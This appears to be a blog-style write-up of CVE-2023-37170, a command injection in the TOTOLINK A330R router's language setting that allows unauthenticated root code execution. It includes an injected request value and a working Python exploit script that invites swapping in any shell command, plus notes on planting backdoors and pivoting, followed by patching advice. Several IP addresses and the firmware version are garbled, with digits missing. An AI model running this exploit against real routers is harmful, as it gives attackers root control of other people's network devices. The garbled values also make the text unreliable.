CVE-2023-37170 - Unauthenticated RCE in TOTOLINK A330R (lang Parameter Exploit)

TOTOLINK routers are used in homes and small businesses all over the world. In mid-2023, security researchers discovered a serious vulnerability in the TOTOLINK A330R router, version V17..cu.557_B20221024. This weakness—CVE-2023-37170—allows remote attackers to run code on the device without logging in, simply by abusing a single web request.

In this post, we'll break down how the bug works, share code examples, and explain the simple steps leading to unauthenticated remote code execution using the setLanguageCfg function's lang parameter. You'll also find references and resources if you want to dig into the details or check if your router is at risk.

What Is CVE-2023-37170?

CVE-2023-37170 is an unauthenticated remote code execution (RCE) vulnerability. It sits in TOTOLINK A330R routers (model and version: V17..cu.557_B20221024). The flaw is due to missing checks and improper handling of user input in the device’s language configuration endpoint.

Key Danger:
Anyone connected to the same network (or sometimes even from the internet if the admin panel is exposed) could run any command on your router as root—no password needed.

Where’s the Problem? (Technical Breakdown)

The TOTOLINK web interface has a function called setLanguageCfg. This function takes a lang parameter to change the router’s display language. But it does NOT properly check or sanitize what’s given. That means, if you send a custom (malicious) value in this parameter, you can break out and inject arbitrary system commands.

Example Vulnerable Request

Let’s say the router's local IP is 192.168..1. Here's what a normal language set request looks like:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded

topicurl=setting/setLanguageCfg&lang=en

But with this vulnerability, you can change lang=en to inject commands like this

topicurl=setting/setLanguageCfg&lang=en;uname -a;#

The # comments the rest (if necessary).

- This payload causes the router to execute the system command uname -a (which prints the Linux kernel info).

Exploiting CVE-2023-37170 (Step-by-Step)

Below is a simple Python script to demonstrate how an attacker would exploit this flaw to run any shell command—here, we'll use id to show the current user, proving code execution.

import requests

target_url = 'http://192.168..1/cgi-bin/cstecgi.cgi';

# Change this to any command you want to run on the router
payload = 'en;id;#'
data = {
    'topicurl': 'setting/setLanguageCfg',
    'lang': payload
}

# By default, no auth is needed for this exploit!
response = requests.post(target_url, data=data)

print(response.text)

What happens:
If the router is vulnerable, the response from the router will include output from the id command (like uid=(root)...), proving code execution.

> Real attack: An attacker can replace id with anything: create backdoors, open up telnet, or fetch malware.

Here are a few things an attacker might do

- Increase Privileges: As root, they can change settings, steal passwords, or even brick the router.

Backdoor Device: Persistent malware can be installed using simple shell scripts.

- Pivot: Attackers can use the router as a launching point to attack other computers on the network.

How to Protect Yourself

- Update Firmware: As of June 2024, check TOTOLINK’s official support page for firmware updates. If your device is vulnerable, install the latest patch immediately.

Restrict WAN Access: Never expose the router admin interface to the public internet.

- Network Segmentation: Put IoT and guest devices (including your router admin interface) in their own VLANs/subnets whenever possible.

References & More Info

- NVD - CVE-2023-37170 Detail
- Totolink firmware updates

Exploit Example:
- Exploit-DB: TOTOLINK A330R Unauthenticated RCE PoC

Final Notes

CVE-2023-37170 shows how even a simple web form, if not properly checked, can be a huge risk. Always keep your routers updated, turn off remote management unless you really need it, and use strong passwords—even if the bug in this case could skip authentication!

If you have a TOTOLINK A330R on firmware V17..cu.557_B20221024 (or similar), check for firmware updates now. If no patch is available, consider replacing your device or at least lock it behind a firewall to limit who can talk to it.

Timeline

Published on: 07/07/2023 20:15:00 UTC
Last modified on: 07/13/2023 17:31:00 UTC